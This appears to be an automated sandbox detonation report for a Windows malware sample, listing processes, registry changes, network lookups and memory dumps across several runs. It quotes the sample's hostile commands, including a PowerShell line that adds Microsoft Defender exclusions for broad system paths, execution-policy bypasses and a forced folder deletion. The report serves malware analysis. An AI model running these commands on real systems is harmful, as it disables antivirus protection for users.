"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath $env:ProgramData, $env:AppData, $env:SystemDrive\ "
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /K rd /s /q "C:\Users\Admin\AppData\Roaming\services" & EXIT
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 252.15.104.51.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 177.178.17.96.in-addr.arpa | udp |
Files
memory/1632-2-0x0000000072730000-0x0000000072E1E000-memory.dmp
memory/1632-4-0x0000000007430000-0x0000000007440000-memory.dmp
memory/1632-3-0x0000000007310000-0x0000000007346000-memory.dmp
memory/1632-5-0x0000000007430000-0x0000000007440000-memory.dmp
memory/1632-6-0x0000000007A70000-0x0000000008098000-memory.dmp
memory/1632-7-0x0000000007A10000-0x0000000007A32000-memory.dmp
memory/1632-8-0x00000000082F0000-0x0000000008356000-memory.dmp
memory/1632-9-0x00000000083A0000-0x0000000008406000-memory.dmp
memory/1632-10-0x0000000008410000-0x0000000008760000-memory.dmp
memory/1632-11-0x0000000008240000-0x000000000825C000-memory.dmp
memory/1632-12-0x00000000087E0000-0x000000000882B000-memory.dmp
memory/1632-13-0x0000000008B30000-0x0000000008BA6000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_kfnruqfw.jm4.ps1
| MD5 | c4ca4238a0b923820dcc509a6f75849b |
| SHA1 | 356a192b7913b04c54574d18c28d46e6395428ab |
| SHA256 | 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b |
| SHA512 | 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a |
memory/1632-28-0x0000000009BB0000-0x0000000009C44000-memory.dmp
memory/1632-29-0x00000000098F0000-0x000000000990A000-memory.dmp
memory/1632-30-0x0000000009940000-0x0000000009962000-memory.dmp
memory/1632-31-0x000000000A150000-0x000000000A64E000-memory.dmp
memory/4216-38-0x0000000072730000-0x0000000072E1E000-memory.dmp
memory/4216-39-0x0000000006BB0000-0x0000000006BC0000-memory.dmp
memory/4216-40-0x0000000006BB0000-0x0000000006BC0000-memory.dmp
memory/4216-57-0x000000007EFE0000-0x000000007EFF0000-memory.dmp
memory/4216-58-0x00000000090F0000-0x0000000009123000-memory.dmp
memory/4216-59-0x000000006F4D0000-0x000000006F51B000-memory.dmp
memory/4216-60-0x00000000090D0000-0x00000000090EE000-memory.dmp
memory/4216-65-0x0000000009140000-0x00000000091E5000-memory.dmp
memory/4216-66-0x0000000006BB0000-0x0000000006BC0000-memory.dmp
memory/1632-192-0x0000000072730000-0x0000000072E1E000-memory.dmp
memory/4216-260-0x0000000006D90000-0x0000000006DAA000-memory.dmp
memory/4216-265-0x0000000006D80000-0x0000000006D88000-memory.dmp
memory/4216-281-0x0000000072730000-0x0000000072E1E000-memory.dmp
memory/1632-282-0x0000000007430000-0x0000000007440000-memory.dmp
memory/1632-284-0x0000000007430000-0x0000000007440000-memory.dmp
memory/1632-285-0x0000000007430000-0x0000000007440000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 69abf6b01a287d3bab9aa753a19562ac |
| SHA1 | cb002d745055132c11e5432f9ca5c8f452c6067d |
| SHA256 | 477924224be8ac5194c94a52115ac451c63530c0ce9bfe757598ef9cf84b495e |
| SHA512 | 70c2b8f847da67b95a3d15cea9912cddddfc59d7f1f2f350c3c1c13e28baa5f6efd448013e5134e9f909705be7b0e38e6748aacce4237e6b0e2cdedaa647bccf |
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
| MD5 | db01a2c1c7e70b2b038edf8ad5ad9826 |
| SHA1 | 540217c647a73bad8d8a79e3a0f3998b5abd199b |
| SHA256 | 413da361d77055dae7007f82b58b366c8783aa72e0b8fbe41519b940c253b38d |
| SHA512 | c76ff57fcee5cdf9fdf3116d4e1dc0cf106867bf19ab474b763e242acf5dca9a7509cb837c35e130c3e056636b4e8a4e135512a978bcd3dd641e20f5bf76c3d6 |
memory/1632-290-0x0000000072730000-0x0000000072E1E000-memory.dmp
Analysis: behavioral13
Detonation Overview
Submitted
2024-02-23 10:15
Reported
2024-02-23 10:22
Platform
win10-20240221-en
Max time kernel
117s
Max time network
140s
Command Line
Signatures
Enumerates physical storage devices
Modifies system certificate store
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D69B561148F01C77C54578C10926DF5B856976AD | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\data\Launcher.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D69B561148F01C77C54578C10926DF5B856976AD\Blob = 0f00000001000000200000005229ba15b31b0c6f4cca89c2985177974327d1b689a3b935a0bd975532af22ab090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b06010505070308530000000100000040000000303e301f06092b06010401a032010130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00b000000010000003000000047006c006f00620061006c005300690067006e00200052006f006f00740020004300410020002d002000520033000000620000000100000020000000cbb522d7b7f127ad6a0113865bdf1cd4102e7d0759af635a7cf4720dc963c53b1400000001000000140000008ff04b7fa82e4524ae4d50fa639a8bdee2dd1bbc1d000000010000001000000001728e1ecf7a9d86fb3cec8948aba953030000000100000014000000d69b561148f01c77c54578c10926df5b856976ad2000000001000000630300003082035f30820247a003020102020b04000000000121585308a2300d06092a864886f70d01010b0500304c3120301e060355040b1317476c6f62616c5369676e20526f6f74204341202d20523331133011060355040a130a476c6f62616c5369676e311330110603550403130a476c6f62616c5369676e301e170d3039303331383130303030305a170d3239303331383130303030305a304c3120301e060355040b1317476c6f62616c5369676e20526f6f74204341202d20523331133011060355040a130a476c6f62616c5369676e311330110603550403130a476c6f62616c5369676e30820122300d06092a864886f70d01010105000382010f003082010a0282010100cc2576907906782216f5c083b684ca289efd057611c5ad8872fc460243c7b28a9d045f24cb2e4be1608246e152ab0c8147706cdd64d1ebf52ca30f823d0c2bae97d7b614861079bb3b1380778c08e149d26a622f1f5efa9668df892795389f06d73ec9cb26590d73deb0c8e9260e8315c6ef5b8bd20460ca49a628f6693bf6cbc82891e59d8a615737ac7414dc74e03aee722f2e9cfbd0bbbff53d00e10633e8822bae53a63a16738cdd410e203ac0b4a7a1e9b24f902e3260e957cbb904926868e538266075b29f77ff9114efae2049fcad401548d1023161195eb897efad77b7649a7abf5fc113ef9b62fb0d6ce0546916a903da6ee983937176c6698582170203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e041604148ff04b7fa82e4524ae4d50fa639a8bdee2dd1bbc300d06092a864886f70d01010b050003820101004b40dbc050aafec80ceff796544549bb96000941acb3138686280733ca6be674b9ba002daea40ad3f5f1f10f8abf73674a83c7447b78e0af6e6c6f03298e333945c38ee4b9576caafc1296ec53c62de4246cb99463fbdc536867563e83b8cf3521c3c968fecedac253aacc908ae9f05d468c95dd7a58281a2f1ddecd0037418fed446dd75328977ef367041e15d78a96b4d3de4c27a44c1b737376f41799c21f7a0ee32d08ad0a1c2cff3cab550e0f917e36ebc35749bee12e2d7c608bc3415113239dcef7326b9401a899e72c331f3a3b25d28640ce3b2c8678c9612f14baeedb556fdf84ee05094dbd28d872ced36250651eeb92978331d9b3b5ca47583f5f | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\data\Launcher.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D69B561148F01C77C54578C10926DF5B856976AD\Blob = 040000000100000010000000c5dfb849ca051355ee2dba1ac33eb028030000000100000014000000d69b561148f01c77c54578c10926df5b856976ad1d000000010000001000000001728e1ecf7a9d86fb3cec8948aba9531400000001000000140000008ff04b7fa82e4524ae4d50fa639a8bdee2dd1bbc620000000100000020000000cbb522d7b7f127ad6a0113865bdf1cd4102e7d0759af635a7cf4720dc963c53b0b000000010000003000000047006c006f00620061006c005300690067006e00200052006f006f00740020004300410020002d002000520033000000530000000100000040000000303e301f06092b06010401a032010130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b060105050703080f00000001000000200000005229ba15b31b0c6f4cca89c2985177974327d1b689a3b935a0bd975532af22ab2000000001000000630300003082035f30820247a003020102020b04000000000121585308a2300d06092a864886f70d01010b0500304c3120301e060355040b1317476c6f62616c5369676e20526f6f74204341202d20523331133011060355040a130a476c6f62616c5369676e311330110603550403130a476c6f62616c5369676e301e170d3039303331383130303030305a170d3239303331383130303030305a304c3120301e060355040b1317476c6f62616c5369676e20526f6f74204341202d20523331133011060355040a130a476c6f62616c5369676e311330110603550403130a476c6f62616c5369676e30820122300d06092a864886f70d01010105000382010f003082010a0282010100cc2576907906782216f5c083b684ca289efd057611c5ad8872fc460243c7b28a9d045f24cb2e4be1608246e152ab0c8147706cdd64d1ebf52ca30f823d0c2bae97d7b614861079bb3b1380778c08e149d26a622f1f5efa9668df892795389f06d73ec9cb26590d73deb0c8e9260e8315c6ef5b8bd20460ca49a628f6693bf6cbc82891e59d8a615737ac7414dc74e03aee722f2e9cfbd0bbbff53d00e10633e8822bae53a63a16738cdd410e203ac0b4a7a1e9b24f902e3260e957cbb904926868e538266075b29f77ff9114efae2049fcad401548d1023161195eb897efad77b7649a7abf5fc113ef9b62fb0d6ce0546916a903da6ee983937176c6698582170203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e041604148ff04b7fa82e4524ae4d50fa639a8bdee2dd1bbc300d06092a864886f70d01010b050003820101004b40dbc050aafec80ceff796544549bb96000941acb3138686280733ca6be674b9ba002daea40ad3f5f1f10f8abf73674a83c7447b78e0af6e6c6f03298e333945c38ee4b9576caafc1296ec53c62de4246cb99463fbdc536867563e83b8cf3521c3c968fecedac253aacc908ae9f05d468c95dd7a58281a2f1ddecd0037418fed446dd75328977ef367041e15d78a96b4d3de4c27a44c1b737376f41799c21f7a0ee32d08ad0a1c2cff3cab550e0f917e36ebc35749bee12e2d7c608bc3415113239dcef7326b9401a899e72c331f3a3b25d28640ce3b2c8678c9612f14baeedb556fdf84ee05094dbd28d872ced36250651eeb92978331d9b3b5ca47583f5f | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\data\Launcher.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D69B561148F01C77C54578C10926DF5B856976AD\Blob = 190000000100000010000000d0fd3c9c380d7b65e26b9a3fedd39b8f0f00000001000000200000005229ba15b31b0c6f4cca89c2985177974327d1b689a3b935a0bd975532af22ab090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b06010505070308530000000100000040000000303e301f06092b06010401a032010130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00b000000010000003000000047006c006f00620061006c005300690067006e00200052006f006f00740020004300410020002d002000520033000000620000000100000020000000cbb522d7b7f127ad6a0113865bdf1cd4102e7d0759af635a7cf4720dc963c53b1400000001000000140000008ff04b7fa82e4524ae4d50fa639a8bdee2dd1bbc1d000000010000001000000001728e1ecf7a9d86fb3cec8948aba953030000000100000014000000d69b561148f01c77c54578c10926df5b856976ad040000000100000010000000c5dfb849ca051355ee2dba1ac33eb0282000000001000000630300003082035f30820247a003020102020b04000000000121585308a2300d06092a864886f70d01010b0500304c3120301e060355040b1317476c6f62616c5369676e20526f6f74204341202d20523331133011060355040a130a476c6f62616c5369676e311330110603550403130a476c6f62616c5369676e301e170d3039303331383130303030305a170d3239303331383130303030305a304c3120301e060355040b1317476c6f62616c5369676e20526f6f74204341202d20523331133011060355040a130a476c6f62616c5369676e311330110603550403130a476c6f62616c5369676e30820122300d06092a864886f70d01010105000382010f003082010a0282010100cc2576907906782216f5c083b684ca289efd057611c5ad8872fc460243c7b28a9d045f24cb2e4be1608246e152ab0c8147706cdd64d1ebf52ca30f823d0c2bae97d7b614861079bb3b1380778c08e149d26a622f1f5efa9668df892795389f06d73ec9cb26590d73deb0c8e9260e8315c6ef5b8bd20460ca49a628f6693bf6cbc82891e59d8a615737ac7414dc74e03aee722f2e9cfbd0bbbff53d00e10633e8822bae53a63a16738cdd410e203ac0b4a7a1e9b24f902e3260e957cbb904926868e538266075b29f77ff9114efae2049fcad401548d1023161195eb897efad77b7649a7abf5fc113ef9b62fb0d6ce0546916a903da6ee983937176c6698582170203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e041604148ff04b7fa82e4524ae4d50fa639a8bdee2dd1bbc300d06092a864886f70d01010b050003820101004b40dbc050aafec80ceff796544549bb96000941acb3138686280733ca6be674b9ba002daea40ad3f5f1f10f8abf73674a83c7447b78e0af6e6c6f03298e333945c38ee4b9576caafc1296ec53c62de4246cb99463fbdc536867563e83b8cf3521c3c968fecedac253aacc908ae9f05d468c95dd7a58281a2f1ddecd0037418fed446dd75328977ef367041e15d78a96b4d3de4c27a44c1b737376f41799c21f7a0ee32d08ad0a1c2cff3cab550e0f917e36ebc35749bee12e2d7c608bc3415113239dcef7326b9401a899e72c331f3a3b25d28640ce3b2c8678c9612f14baeedb556fdf84ee05094dbd28d872ced36250651eeb92978331d9b3b5ca47583f5f | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\data\Launcher.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D69B561148F01C77C54578C10926DF5B856976AD\Blob = 5c000000010000000400000000080000040000000100000010000000c5dfb849ca051355ee2dba1ac33eb028030000000100000014000000d69b561148f01c77c54578c10926df5b856976ad1d000000010000001000000001728e1ecf7a9d86fb3cec8948aba9531400000001000000140000008ff04b7fa82e4524ae4d50fa639a8bdee2dd1bbc620000000100000020000000cbb522d7b7f127ad6a0113865bdf1cd4102e7d0759af635a7cf4720dc963c53b0b000000010000003000000047006c006f00620061006c005300690067006e00200052006f006f00740020004300410020002d002000520033000000530000000100000040000000303e301f06092b06010401a032010130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b060105050703080f00000001000000200000005229ba15b31b0c6f4cca89c2985177974327d1b689a3b935a0bd975532af22ab190000000100000010000000d0fd3c9c380d7b65e26b9a3fedd39b8f2000000001000000630300003082035f30820247a003020102020b04000000000121585308a2300d06092a864886f70d01010b0500304c3120301e060355040b1317476c6f62616c5369676e20526f6f74204341202d20523331133011060355040a130a476c6f62616c5369676e311330110603550403130a476c6f62616c5369676e301e170d3039303331383130303030305a170d3239303331383130303030305a304c3120301e060355040b1317476c6f62616c5369676e20526f6f74204341202d20523331133011060355040a130a476c6f62616c5369676e311330110603550403130a476c6f62616c5369676e30820122300d06092a864886f70d01010105000382010f003082010a0282010100cc2576907906782216f5c083b684ca289efd057611c5ad8872fc460243c7b28a9d045f24cb2e4be1608246e152ab0c8147706cdd64d1ebf52ca30f823d0c2bae97d7b614861079bb3b1380778c08e149d26a622f1f5efa9668df892795389f06d73ec9cb26590d73deb0c8e9260e8315c6ef5b8bd20460ca49a628f6693bf6cbc82891e59d8a615737ac7414dc74e03aee722f2e9cfbd0bbbff53d00e10633e8822bae53a63a16738cdd410e203ac0b4a7a1e9b24f902e3260e957cbb904926868e538266075b29f77ff9114efae2049fcad401548d1023161195eb897efad77b7649a7abf5fc113ef9b62fb0d6ce0546916a903da6ee983937176c6698582170203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e041604148ff04b7fa82e4524ae4d50fa639a8bdee2dd1bbc300d06092a864886f70d01010b050003820101004b40dbc050aafec80ceff796544549bb96000941acb3138686280733ca6be674b9ba002daea40ad3f5f1f10f8abf73674a83c7447b78e0af6e6c6f03298e333945c38ee4b9576caafc1296ec53c62de4246cb99463fbdc536867563e83b8cf3521c3c968fecedac253aacc908ae9f05d468c95dd7a58281a2f1ddecd0037418fed446dd75328977ef367041e15d78a96b4d3de4c27a44c1b737376f41799c21f7a0ee32d08ad0a1c2cff3cab550e0f917e36ebc35749bee12e2d7c608bc3415113239dcef7326b9401a899e72c331f3a3b25d28640ce3b2c8678c9612f14baeedb556fdf84ee05094dbd28d872ced36250651eeb92978331d9b3b5ca47583f5f | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\data\Launcher.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 1428 wrote to memory of 216 | N/A | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\data\Launcher.exe | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
| PID 1428 wrote to memory of 216 | N/A | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\data\Launcher.exe | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
| PID 1428 wrote to memory of 216 | N/A | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\data\Launcher.exe | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
| PID 1428 wrote to memory of 3564 | N/A | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\data\Launcher.exe | C:\Windows\SysWOW64\cmd.exe |
| PID 1428 wrote to memory of 3564 | N/A | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\data\Launcher.exe | C:\Windows\SysWOW64\cmd.exe |
| PID 1428 wrote to memory of 3564 | N/A | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\data\Launcher.exe | C:\Windows\SysWOW64\cmd.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\data\Launcher.exe
"C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\data\Launcher.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath $env:ProgramData, $env:AppData, $env:SystemDrive\ "
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /K rd /s /q "C:\Users\Admin\AppData\Roaming\services" & EXIT
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 79.121.231.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 14.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 3.173.189.20.in-addr.arpa | udp |
Files
memory/216-2-0x00000000029E0000-0x0000000002A16000-memory.dmp
memory/216-4-0x0000000006750000-0x0000000006760000-memory.dmp
memory/216-5-0x0000000006750000-0x0000000006760000-memory.dmp
memory/216-3-0x0000000072590000-0x0000000072C7E000-memory.dmp
memory/216-6-0x0000000006D90000-0x00000000073B8000-memory.dmp
memory/216-7-0x0000000006B10000-0x0000000006B32000-memory.dmp
memory/216-8-0x00000000074C0000-0x0000000007526000-memory.dmp
memory/216-9-0x0000000006CB0000-0x0000000006D16000-memory.dmp
memory/216-10-0x00000000075F0000-0x0000000007940000-memory.dmp
memory/216-11-0x0000000007530000-0x000000000754C000-memory.dmp
memory/216-12-0x0000000007AD0000-0x0000000007B1B000-memory.dmp
memory/216-13-0x0000000007D20000-0x0000000007D96000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_nyf2y54q.0jq.ps1
| MD5 | c4ca4238a0b923820dcc509a6f75849b |
| SHA1 | 356a192b7913b04c54574d18c28d46e6395428ab |
| SHA256 | 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b |
| SHA512 | 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a |
memory/216-30-0x000000007E570000-0x000000007E580000-memory.dmp
memory/216-31-0x0000000008DA0000-0x0000000008DD3000-memory.dmp
memory/216-32-0x0000000070FB0000-0x0000000070FFB000-memory.dmp
memory/216-33-0x0000000008D80000-0x0000000008D9E000-memory.dmp
memory/216-38-0x0000000008DE0000-0x0000000008E85000-memory.dmp
memory/216-39-0x0000000006750000-0x0000000006760000-memory.dmp
memory/216-40-0x00000000090A0000-0x0000000009134000-memory.dmp
memory/216-233-0x0000000006870000-0x000000000688A000-memory.dmp
memory/216-238-0x0000000006860000-0x0000000006868000-memory.dmp
memory/216-254-0x0000000072590000-0x0000000072C7E000-memory.dmp
Analysis: behavioral18
Detonation Overview
Submitted
2024-02-23 10:15
Reported
2024-02-23 10:22
Platform
win10-20240221-en
Max time kernel
128s
Max time network
136s
Command Line
Signatures
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: 33 | N/A | C:\Windows\system32\AUDIODG.EXE | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\system32\AUDIODG.EXE | N/A |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\data\Data\YXNOU01Xhpmc.ps1
C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x234
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 11.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 0.205.248.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 123.10.44.20.in-addr.arpa | udp |
Files
memory/1376-5-0x00007FF9C4B90000-0x00007FF9C557C000-memory.dmp
memory/1376-4-0x00000114708F0000-0x0000011470912000-memory.dmp
memory/1376-6-0x0000011470960000-0x0000011470970000-memory.dmp
memory/1376-9-0x0000011470DF0000-0x0000011470E66000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_3riaytwg.avm.ps1
| MD5 | c4ca4238a0b923820dcc509a6f75849b |
| SHA1 | 356a192b7913b04c54574d18c28d46e6395428ab |
| SHA256 | 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b |
| SHA512 | 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a |
memory/1376-30-0x0000011470960000-0x0000011470970000-memory.dmp
memory/1376-36-0x00007FF9C4B90000-0x00007FF9C557C000-memory.dmp
Analysis: behavioral23
Detonation Overview
Submitted
2024-02-23 10:15
Reported
2024-02-23 10:22
Platform
win10-20240221-en
Max time kernel
128s
Max time network
137s
Command Line
Signatures
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\data\TCLZMA64.dll,#1
Network
| Country | Destination | Domain | Proto |
| US | 138.91.171.81:80 | tcp | |
| US | 8.8.8.8:53 | 129.134.221.88.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 22.236.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 11.173.189.20.in-addr.arpa | udp |
Files
Analysis: behavioral25
Detonation Overview
Submitted
2024-02-23 10:15
Reported
2024-02-23 10:23
Platform
win10-20240221-en
Max time kernel
119s
Max time network
138s
Command Line
Signatures
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\data\TCshareWin10x64.dll,#1
Network
| Country | Destination | Domain | Proto |
| US | 20.231.121.79:80 | tcp | |
| US | 8.8.8.8:53 | 43.229.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 169.117.168.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 189.178.17.96.in-addr.arpa | udp |
Files
Analysis: behavioral28
Detonation Overview
Submitted
2024-02-23 10:15
Reported
2024-02-23 10:22
Platform
win10-20240221-en
Max time kernel
115s
Max time network
140s
Command Line
Signatures
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\data\Tools\dkAdSRKzVAXO.ps1
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 96.134.221.88.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 19.229.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 209.143.182.52.in-addr.arpa | udp |
Files
memory/4848-4-0x00007FFDE2120000-0x00007FFDE2B0C000-memory.dmp
memory/4848-5-0x000002ADE9E90000-0x000002ADE9EA0000-memory.dmp
memory/4848-7-0x000002ADE9E90000-0x000002ADE9EA0000-memory.dmp
memory/4848-6-0x000002ADE9EA0000-0x000002ADE9EC2000-memory.dmp
memory/4848-10-0x000002ADEA050000-0x000002ADEA0C6000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_edausfig.gxw.ps1
| MD5 | c4ca4238a0b923820dcc509a6f75849b |
| SHA1 | 356a192b7913b04c54574d18c28d46e6395428ab |
| SHA256 | 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b |
| SHA512 | 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a |
memory/4848-32-0x000002ADE9E90000-0x000002ADE9EA0000-memory.dmp
memory/4848-34-0x00007FFDE2120000-0x00007FFDE2B0C000-memory.dmp
memory/4848-35-0x000002ADE9E90000-0x000002ADE9EA0000-memory.dmp
memory/4848-36-0x000002ADE9E90000-0x000002ADE9EA0000-memory.dmp
memory/4848-37-0x000002ADE9E90000-0x000002ADE9EA0000-memory.dmp
Analysis: behavioral31
Detonation Overview
Submitted
2024-02-23 10:15
Reported
2024-02-23 10:22
Platform
win10-20240221-en
Max time kernel
124s
Max time network
132s
Command Line
Signatures
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\data\WCMICONS.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\data\WCMICONS.exe
"C:\Users\Admin\AppData\Local\Temp\data\WCMICONS.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 228 -s 232
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 241.110.86.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 11.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 7.173.189.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 0.205.248.87.in-addr.arpa | udp |
Files
Analysis: behavioral22
Detonation Overview
Submitted
2024-02-23 10:15
Reported
2024-02-23 10:22
Platform
win10-20240221-en
Max time kernel
128s
Max time network
136s
Command Line
Signatures
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\data\TC7Z64.dll,#1
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 129.134.221.88.in-addr.arpa | udp |
| US | 20.231.121.79:80 | tcp | |
| US | 8.8.8.8:53 | 13.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 88.65.42.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp |
Files
Analysis: behavioral24
Detonation Overview
Submitted
2024-02-23 10:15
Reported
2024-02-23 10:23
Platform
win10-20240221-en
Max time kernel
121s
Max time network
140s
Command Line
Signatures
Processes
C:\Windows\system32\rundll32.exe
